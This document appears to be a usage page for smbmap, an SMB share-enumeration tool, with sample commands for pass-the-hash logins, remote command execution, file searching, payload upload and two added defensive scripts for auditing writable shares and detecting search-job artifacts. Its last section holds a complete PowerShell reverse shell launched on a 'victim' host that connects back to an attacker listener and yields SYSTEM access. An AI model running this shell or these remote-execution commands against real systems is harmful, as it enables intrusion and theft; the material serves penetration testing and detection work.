Smbmap


Installation


$ sudo pip3 install smbmap
$ smbmap
smbmap
usage: smbmap [-h] (-H HOST | --host-file FILE) [-u USERNAME] [-p PASSWORD | --prompt] [-s SHARE] [-d DOMAIN]
              [-P PORT] [-v] [--admin] [--no-banner] [--no-color] [--no-update] [-x COMMAND] [--mode CMDMODE]
              [-L | -r [PATH]] [-A PATTERN | -g FILE | --csv FILE] [--dir-only] [--no-write-check]
              [-q] [--depth DEPTH] [--exclude SHARE [SHARE ...]] [-F PATTERN] [--search-path PATH]
              [--search-timeout TIMEOUT] [--download PATH] [--upload SRC DST] [--delete PATH TO FILE] [--skip]
...
    

Features:

  • Pass-the-Hash Support
  • File upload/download/delete
  • Permission enumeration (writable share, meet Metasploit)
  • Remote Command Execution
  • Distributed file content searching (beta!)
  • File name matching (with an auto download capability)
  • Host file parser supports IPs, host names, and CIDR

Help


usage: smbmap.py [-h] (-H HOST | --host-file FILE) [-u USERNAME] [-p PASSWORD | --prompt] [-s SHARE] [-d DOMAIN] [-P PORT] [-v] [--admin] [--no-banner] [--no-color] [--no-update] [--timeout SCAN_TIMEOUT] [-x COMMAND] [--mode CMDMODE]
                 [-L | -r [PATH]] [-A PATTERN | -g FILE | --csv FILE] [--dir-only] [--no-write-check] [-q] [--depth DEPTH] [--exclude SHARE [SHARE ...]] [-F PATTERN] [--search-path PATH] [--search-timeout TIMEOUT] [--download PATH]
                 [--upload SRC DST] [--delete PATH TO FILE] [--skip]
...
    

Command Execution:


$ python smbmap.py -u jsmith -p 'R33nisP!nckle' -d ABC -H 192.168.2.50 -x 'net group "Domain Admins" /domain'
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 192.168.2.50:445        Name: unkown
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
abcadmin
The command completed successfully.

Non recursive path listing (ls):


$ python smbmap.py -H 172.16.0.24 -u Administrator -p 'changeMe' -r 'C$/Users'
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 172.16.0.24:445 Name: 172.16.0.24
    Disk                                                    Permissions
    ----                                                    -----------
    C$                                                      READ, WRITE
    .Users
    dw--w--w--                0 Wed Apr 29 13:15:25 2015    .
    dw--w--w--                0 Wed Apr 29 13:15:25 2015    ..
    dr--r--r--                0 Wed Apr 22 14:50:36 2015    Administrator
    dr--r--r--                0 Thu Apr  9 14:46:57 2015    All Users
    dw--w--w--                0 Thu Apr  9 14:46:49 2015    Default
    dr--r--r--                0 Thu Apr  9 14:46:57 2015    Default User
    fr--r--r--              174 Thu Apr  9 14:44:01 2015    desktop.ini
    dw--w--w--                0 Thu Apr  9 14:46:49 2015    Public
    dr--r--r--                0 Wed Apr 22 13:33:01 2015    wingus

File Content Searching:


$ python smbmap.py --host-file ~/Desktop/smb-workstation-sml.txt -u NopSec -p 'NopSec1234!' -d widgetworld -F '[1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]'
[+] Finding open SMB ports....
[+] User SMB session established on 192.168.0.99...
[+] User SMB session established on 192.168.0.85...
[+] User SMB session established on 192.168.0.89...
[+] File search started on 1 hosts...this could take a while
[+] Job 4650e5a97b9f4ca884613f4b started on 192.168.0.99, result will be stored at C:\Temp\4650e5a97b9f4ca884613f4b.txt
[+] File search started on 2 hosts...this could take a while
[+] Job e0c822a802eb455f96259f33 started on 192.168.0.85, result will be stored at C:\Windows\TEMP\e0c822a802eb455f96259f33.txt
[+] File search started on 3 hosts...this could take a while
[+] Job 0a5d352bf2bd4e288e0f8f36 started on 192.168.0.89, result will be stored at C:\Temp\0a5d352bf2bd4e288e0f8f36.txt
[+] Grabbing search results, be patient, share drives tend to be big...
[+] Job 1 of 3 completed on 192.168.0.85...
[+] File successfully deleted: C$\Windows\TEMP\e0c822a802eb455f96259f33.txt
[+] Job 2 of 3 completed on 192.168.0.89...
[+] File successfully deleted: C$\Temp\0a5d352bf2bd4e288e0f8f36.txt
[+] Job 3 of 3 completed on 192.168.0.99...
[+] File successfully deleted: C$\Temp\4650e5a97b9f4ca884613f4b.txt
[+] All jobs complete
Host: 192.168.0.85         Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]
No matching patterns found

Host: 192.168.0.89         Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]
C:\Users\terdf\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JY5MGKVO\salesmaps[1].htm
C:\Users\terdf\OldFiles\Cache_2013522\Content.IE5\JY5MGKVO\salesmaps[1].htm
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JY5MGKVO\salesmaps[1].htm

Host: 192.168.0.99         Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]
No matching patterns found

Filesystem Interaction:


$ python smbmap.py -u 'MyUsername' -p 'MyPassword' -d 'MyDomain' -H 192.168.1.100 --download 'C$/Temp/secret.txt'
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 192.168.1.100:445        Name: 192.168.1.100
[+] Downloading file C$/Temp/secret.txt to secret.txt... (101 bytes)
[+] File download successful!

$ python smbmap.py -u 'MyUsername' -p 'MyPassword' -d 'MyDomain' -H 192.168.1.100 --upload 'payload.exe' 'C$/Temp/payload.exe'
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 192.168.1.100:445        Name: 192.168.1.100
[+] Uploading file payload.exe to C$/Temp/payload.exe... (10024 bytes)
[+] File upload successful!

$ python smbmap.py -u 'MyUsername' -p 'MyPassword' -d 'MyDomain' -H 192.168.1.100 --delete 'C$/Temp/malicious.exe'
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 192.168.1.100:445        Name: 192.168.1.100
[+] Are you sure you want to delete the file C$/Temp/malicious.exe? (y/n): y
[+] Deleting remote file C$/Temp/malicious.exe... (Success)

Examples:


$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10
$ python smbmap.py -u user1,user2,user3 -p 'P@ssw0rd!' -d domain -H 192.168.1.10
$ python smbmap.py --host-file hosts.txt -u username -p 'password' -d domain
$ python smbmap.py --host-file hosts.txt --user-file users.txt --pass-file pass.txt -d domain
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 -L
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 -r 'C$'
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 -r 'C$/Program Files'
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 -r 'C$' -A 'web.config'
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 -r 'C$' -g grep_out.txt
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 --download 'C$/Temp/important.txt'
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 --upload 'payload.exe' 'C$/Temp/payload.exe'
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 --delete 'C$/Temp/malicious.exe'
$ python smbmap.py -u username -p 'password' -d domain -H 192.168.1.10 -F '[Pp]assword'

Additional Examples:


$ python smbmap.py -u jsmith -p password1 -d workgroup -H 192.168.0.1
$ python smbmap.py -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 172.16.0.20
$ python smbmap.py -u 'apadmin' -p 'asdf1234!' -d ACME -H 10.1.3.30 -x 'net group "Domain Admins" /domain'

Default Output:


$ ./smbmap.py -H 192.168.12.123 -u administrator -p asdf1234
[+] Finding open SMB ports....
[+] User SMB session established on 192.168.86.39...
[+] IP: 192.168.86.39:445    Name: biffhenderson-pc.lan
    Disk                Permissions    Comment
    ----                -----------    -------
    ADMIN$              READ, WRITE    Remote Admin
    C$                  READ, WRITE    Default share
    IPC$                NO ACCESS    Remote IPC
    Users               READ, WRITE
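The share table above (and the `-r` listing earlier on this page) is printed for a human to read, but the same text is what a share-permission audit consumes: run smbmap with an ordinary domain account against a host list, then flag every non-administrative share that account can write to. The parser below is an added example, not code from smbmap or from this page; it assumes smbmap prints exactly the permission labels READ, WRITE / READ ONLY / WRITE ONLY / NO ACCESS and that share names contain no whitespace. The embedded input is the output shown on this page.

```python
import re
from dataclasses import dataclass
from typing import List

# Output from the smbmap runs shown on this page (the Default Output share table
# and the non-recursive listing of C$/Users), embedded so the parser runs offline.
SHARE_OUTPUT = """\
[+] Finding open SMB ports....
[+] User SMB session established on 192.168.86.39...
[+] IP: 192.168.86.39:445    Name: biffhenderson-pc.lan
    Disk                Permissions    Comment
    ----                -----------    -------
    ADMIN$              READ, WRITE    Remote Admin
    C$                  READ, WRITE    Default share
    IPC$                NO ACCESS    Remote IPC
    Users               READ, WRITE
"""

LISTING_OUTPUT = """\
    dw--w--w--                0 Wed Apr 29 13:15:25 2015    .
    dw--w--w--                0 Wed Apr 29 13:15:25 2015    ..
    dr--r--r--                0 Wed Apr 22 14:50:36 2015    Administrator
    fr--r--r--              174 Thu Apr  9 14:44:01 2015    desktop.ini
    dw--w--w--                0 Thu Apr  9 14:46:49 2015    Public
"""

# Assumption: smbmap prints exactly these permission labels, and share names
# contain no whitespace (true for the output above; adjust if your shares differ).
PERMS = ("READ, WRITE", "READ ONLY", "WRITE ONLY", "NO ACCESS")
HOST_RE = re.compile(r"^\[\+\] IP: (?P<ip>[\d.]+):\d+\s+Name: (?P<name>\S+)")
SHARE_RE = re.compile(
    r"^\s+(?P<share>\S+)\s+(?P<perm>" + "|".join(re.escape(p) for p in PERMS)
    + r")(?:\s+(?P<comment>.*\S))?\s*$"
)
# Listing rows: type flag (d/f), a 9-character mode string, size, mtime, name.
LISTING_RE = re.compile(
    r"^\s+(?P<kind>[df])(?P<mode>[rw-]{9})\s+(?P<size>\d+)\s+"
    r"(?P<mtime>\w{3} \w{3}\s+\d{1,2} \d\d:\d\d:\d\d \d{4})\s+(?P<name>.*\S)\s*$"
)


@dataclass
class Share:
    host: str
    name: str
    permission: str
    comment: str = ""

    @property
    def writable(self) -> bool:
        return "WRITE" in self.permission

    @property
    def is_admin_share(self) -> bool:
        # ADMIN$, C$, IPC$ and similar hidden administrative shares end in '$'.
        return self.name.endswith("$")


@dataclass
class Entry:
    is_dir: bool
    mode: str
    size: int
    mtime: str
    name: str


def parse_shares(text: str) -> List[Share]:
    """Turn smbmap's share table into Share records, tagged with the host line above it."""
    shares, host = [], "unknown"
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group("ip")
            continue
        m = SHARE_RE.match(line)
        if m:
            shares.append(Share(host, m.group("share"), m.group("perm"), m.group("comment") or ""))
    return shares


def parse_listing(text: str) -> List[Entry]:
    """Turn a -r directory listing into Entry records."""
    entries = []
    for line in text.splitlines():
        m = LISTING_RE.match(line)
        if m:
            entries.append(Entry(m.group("kind") == "d", m.group("mode"),
                                 int(m.group("size")), m.group("mtime"), m.group("name")))
    return entries


def writable_non_admin_shares(shares: List[Share]) -> List[str]:
    """Shares the audit account can write to, excluding the hidden admin shares.
    (A domain user with WRITE on ADMIN$/C$ is also a finding, but a different one:
    that account is over-privileged.)"""
    return [s.name for s in shares if s.writable and not s.is_admin_share]


if __name__ == "__main__":
    shares = parse_shares(SHARE_OUTPUT)
    for s in shares:
        print(f"{s.host} {s.name:<8} {s.permission:<12} {s.comment}")
    print("writable non-admin shares:", writable_non_admin_shares(shares))
    for e in parse_listing(LISTING_OUTPUT):
        print("d" if e.is_dir else "f", e.mode, e.size, e.name)
```

Feed it the combined output of a `--host-file` run and the `writable_non_admin_shares` list becomes the remediation queue: every entry is a share where a plain domain user can drop or modify files.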

Command Execution:


$ python smbmap.py -u ariley -p 'P@$$w0rd1234!' -d ABC -x 'net group "Domain Admins" /domain' -H 192.168.2.50
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 192.168.2.50:445    Name: unknown
Group name     Domain Admins
Comment        Designated administrators of the domain

Members
-------------------------------------------------------------------------------
abcadmin
The command completed successfully.

File Content Searching:


$ python smbmap.py --host-file ~/Desktop/smb-workstation-sml.txt -u NopSec -p 'NopSec1234!' -d widgetworld -F '[1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]'
[+] Finding open SMB ports....
[+] User SMB session established on 192.168.0.99...
[+] User SMB session established on 192.168.0.85...
[+] User SMB session established on 192.168.0.89...
[+] File search started on 1 hosts...this could take a while
[+] Job 4650e5a97b9f4ca884613f4b started on 192.168.0.99, result will be stored at C:\Temp\4650e5a97b9f4ca884613f4b.txt
[+] File search started on 2 hosts...this could take a while
[+] Job e0c822a802eb455f96259f33 started on 192.168.0.85, result will be stored at C:\Windows\TEMP\e0c822a802eb455f96259f33.txt
[+] File search started on 3 hosts...this could take a while
[+] Job 0a5d352bf2bd4e288e0f8f36 started on 192.168.0.89, result will be stored at C:\Temp\0a5d352bf2bd4e288e0f8f36.txt
[+] Grabbing search results, be patient, share drives tend to be big...
[+] Job 1 of 3 completed on 192.168.0.85...
[+] File successfully deleted: C$\Windows\TEMP\e0c822a802eb455f96259f33.txt
[+] Job 2 of 3 completed on 192.168.0.89...
[+] File successfully deleted: C$\Temp\0a5d352bf2bd4e288e0f8f36.txt
[+] Job 3 of 3 completed on 192.168.0.99...
[+] File successfully deleted: C$\Temp\4650e5a97b9f4ca884613f4b.txt
[+] All jobs complete
Host: 192.168.0.85         Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]
No matching patterns found

Host: 192.168.0.89         Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]
C:\Users\terdf\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JY5MGKVO\salesmaps[1].htm
C:\Users\terdf\OldFiles\Cache_2013522\Content.IE5\JY5MGKVO\salesmaps[1].htm

Host: 192.168.0.99         Pattern: [1-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9][0-9][0-9]
C:\Users\biffh\AppData\Local\Microsoft\Internet Explorer\DOMStore\L7W17OPZ\static.olark[1].xml
C:\Users\biffh\AppData\Local\Temp\Temporary Internet Files\Content.IE5\MIY2POGJ\validation[2].js
C:\Users\biffh\AppData\Local\Temp\Temporary Internet Files\Content.IE5\NV1MNBWA\Docs[1].htm
C:\Users\biffh\AppData\Local\Temp\Temporary Internet Files\Content.IE5\NV1MNBWA\Salesmaps[1].htm
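Seen from the host side, the search feature leaves a recognisable trace: for each job a file named after the 24-hex-character job id is written to C:\Temp or C:\Windows\TEMP and deleted again as soon as the results are collected, exactly as the "result will be stored at" and "File successfully deleted" lines above record. The following is an added detection example, not part of this page or of smbmap; the event line format (`timestamp|host|action|path`), the hostnames and the timestamps are constructed for the example, while the job file names reuse the job ids printed above.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed file-activity events for this example, in a simple
# "timestamp|host|action|path" line format (an assumption, not a real sensor format).
# The job file names reuse the job ids from the smbmap output above.
SAMPLE_EVENTS = r"""
2024-05-02T10:14:03|ws-085|create|C:\Windows\TEMP\e0c822a802eb455f96259f33.txt
2024-05-02T10:14:05|ws-085|create|C:\Windows\TEMP\wct1234.tmp
2024-05-02T10:14:41|ws-085|delete|C:\Windows\TEMP\e0c822a802eb455f96259f33.txt
2024-05-02T10:14:07|ws-089|create|C:\Temp\0a5d352bf2bd4e288e0f8f36.txt
2024-05-02T10:15:12|ws-089|delete|C:\Temp\0a5d352bf2bd4e288e0f8f36.txt
2024-05-02T10:20:00|ws-099|create|C:\Temp\notes.txt
2024-05-02T10:20:00|ws-099|create|C:\Temp\4650e5a97b9f4ca884613f4b.txt
"""

# smbmap stores search results as <24 hex chars>.txt in C:\Temp or C:\Windows\TEMP
# (see the "result will be stored at" lines above) and deletes the file afterwards.
JOB_FILE_RE = re.compile(
    r"^[A-Za-z]:\\(?:Temp|Windows\\TEMP)\\[0-9a-f]{24}\.txt$", re.IGNORECASE
)


def parse_events(text: str):
    """Parse the constructed event lines into (timestamp, host, action, path) tuples, time-ordered."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, action, path = line.split("|", 3)
        events.append((datetime.fromisoformat(ts), host, action.lower(), path))
    return sorted(events)


def find_search_job_artifacts(text: str, window: timedelta = timedelta(minutes=10)) -> List[Dict]:
    """Pair create/delete events for files matching the job-file pattern.
    A create followed by a delete within `window` is the high-confidence shape;
    a create with no delete seen is reported too, since the collection step may
    have failed and the result file may still be on disk."""
    pending = {}   # (host, lowercased path) -> (created_at, original path)
    findings = []
    for ts, host, action, path in parse_events(text):
        if not JOB_FILE_RE.match(path):
            continue
        key = (host, path.lower())
        if action == "create":
            pending[key] = (ts, path)
        elif action == "delete" and key in pending:
            created, orig = pending.pop(key)
            findings.append({"host": host, "path": orig, "created": created,
                             "deleted": ts, "short_lived": ts - created <= window})
    for (host, _), (created, orig) in pending.items():
        findings.append({"host": host, "path": orig, "created": created,
                         "deleted": None, "short_lived": False})
    return findings


if __name__ == "__main__":
    for f in find_search_job_artifacts(SAMPLE_EVENTS):
        state = "created+deleted" if f["deleted"] else "created, not deleted"
        print(f'{f["host"]}: {f["path"]} ({state}, short_lived={f["short_lived"]})')
```

The pattern is deliberately narrow (fixed directories, exactly 24 lowercase hex characters, `.txt`), so ordinary temp files such as `wct1234.tmp` or `notes.txt` are ignored; a hit that is created and removed within a minute on several hosts at once is the shape worth alerting on, and a hit that is never deleted is a result file still waiting to be collected or cleaned up.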

Drive Listing:

This feature was added to complement the file content searching feature.


$ python smbmap.py -H 192.168.1.24 -u Administrator -p 'R33nisP!nckle' -L
[!] Missing domain...defaulting to WORKGROUP
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 192.168.1.24:445    Name: unknown
[+] Host 192.168.1.24 Local Drives: C:\ D:\
[+] Host 192.168.1.24 Net Drive(s):
    E:      \\vboxsrv\Public      VirtualBox Shared Folders

Nifty Shell:

Run a PowerShell script on the victim SMB host (change the IP address in the code to your own, i.e., the address the shell connects back to).


$ python smbmap.py -u jsmith -p 'R33nisP!nckle' -d ABC -H 192.168.2.50 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.153""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"'
[+] Finding open SMB ports....
[+] User SMB session established...
[+] IP: 192.168.2.50:445    Name: unkown
[!] Error encountered, sharing violation, unable to retrieve output

Attacker's Netcat Listener:


$ nc -l 4445
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system